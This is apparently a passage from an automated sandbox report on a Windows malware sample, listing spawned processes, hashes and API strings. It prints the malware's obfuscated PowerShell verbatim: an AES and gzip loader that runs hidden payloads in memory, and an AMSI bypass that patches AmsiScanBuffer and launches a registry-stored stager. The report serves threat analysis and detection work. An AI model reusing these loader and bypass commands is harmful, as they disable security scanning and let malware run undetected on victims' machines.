Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	23:24:22
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: WerFault.exePID: 7392, Parent PID: 8184

General

Target ID:	27
Start time:	23:24:27
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036
Imagebase:	0x7ff7758e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	23:24:32
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248
Imagebase:	0x7ff7758e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	23:24:32
Start date:	03/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	23:24:32
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	23:24:34
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xf30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	23:24:34
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	23:24:34
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xf30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	23:24:34
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwPbTYxVYhD=$ulnmlpDbsuVQN.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SlSshRHzgoUjvXmeTqL=QuvobnauGMMc @([String])([IntPtr]);$KUNWcDgsbwBzyQuTTnSbbx=QuvobnauGMMc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YxZiZRJBAeC=$ulnmlpDbsuVQN.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vMVwdwXXnratZh=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$jdkLVqxnIKypBMyTV=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$NDrexjH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjEpzNvinnA=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$NDrexjH,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$JhEQuEJeuH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,4,[ref]$JhEQuEJeuH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$awqsGjGjEpzNvinnA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,0x20,[ref]$JhEQuEJeuH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+'x'+''+[Char](45)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	23:24:35
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	23:24:36
Start date:	03/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Imagebase:	0x7ff70f330000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	23:24:36
Start date:	03/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	23:24:37
Start date:	03/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	23:24:38
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	23:24:38
Start date:	03/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74e710000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	23:24:39
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff703d50000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	23:24:40
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	23:24:40
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	23:24:40
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	23:24:41
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	23:24:41
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	23:24:42
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	23:24:43
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	23:24:43
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	23:24:44
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	23:24:45
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	23:24:45
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	23:24:47
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	23:24:47
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	23:24:48
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	23:24:48
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	23:24:49
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	692
Start time:	23:24:59
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	710
Start time:	23:25:07
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.5%
Total number of Nodes:	1514
Total number of Limit Nodes:	6

Executed Functions

Function 0000022123C51E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022123C51E7F

Part of subcall function 0000022123C522A8: GetModuleHandleA.KERNEL32(?,?,?,0000022123C51EB1), ref: 0000022123C522C0
Part of subcall function 0000022123C522A8: GetProcAddress.KERNEL32(?,?,?,0000022123C51EB1), ref: 0000022123C522D1

CreateThread.KERNELBASE ref: 0000022123C52043
TlsAlloc.KERNEL32 ref: 0000022123C52049
TlsAlloc.KERNEL32 ref: 0000022123C52055
TlsAlloc.KERNEL32 ref: 0000022123C52061
TlsAlloc.KERNEL32 ref: 0000022123C5206D
TlsAlloc.KERNEL32 ref: 0000022123C52079
TlsAlloc.KERNEL32 ref: 0000022123C52085

Strings

PdhGetFormattedCounterArrayW, xrefs: 0000022123C51FF1
NtResumeThread, xrefs: 0000022123C51EC2
EnumServicesStatusExW, xrefs: 0000022123C51F71, 0000022123C51F92
NtQuerySystemInformation, xrefs: 0000022123C51EA5
advapi32.dll, xrefs: 0000022123C51F57, 0000022123C51F78
NtEnumerateKey, xrefs: 0000022123C51F19
PdhGetRawCounterArrayW, xrefs: 0000022123C51FD0
NtQueryDirectoryFile, xrefs: 0000022123C51EDF
NtQueryDirectoryFileEx, xrefs: 0000022123C51EFC
sechost.dll, xrefs: 0000022123C51F99
AmsiScanBuffer, xrefs: 0000022123C52012
EnumServiceGroupW, xrefs: 0000022123C51F50
NtDeviceIoControlFile, xrefs: 0000022123C51FB6
amsi.dll, xrefs: 0000022123C52019
ntdll.dll, xrefs: 0000022123C51E8D
pdh.dll, xrefs: 0000022123C51FD7, 0000022123C51FF8
NtEnumerateValueKey, xrefs: 0000022123C51F36

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: e303c6b6d310c1d98142e91b6ef07180afea97f904d151b925c6e5f5f6b7cb27
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 6E51A464120A6EF9EB05DFE4EC49FC43360A7A0754F806713BC091A6A9DF7892FAD740

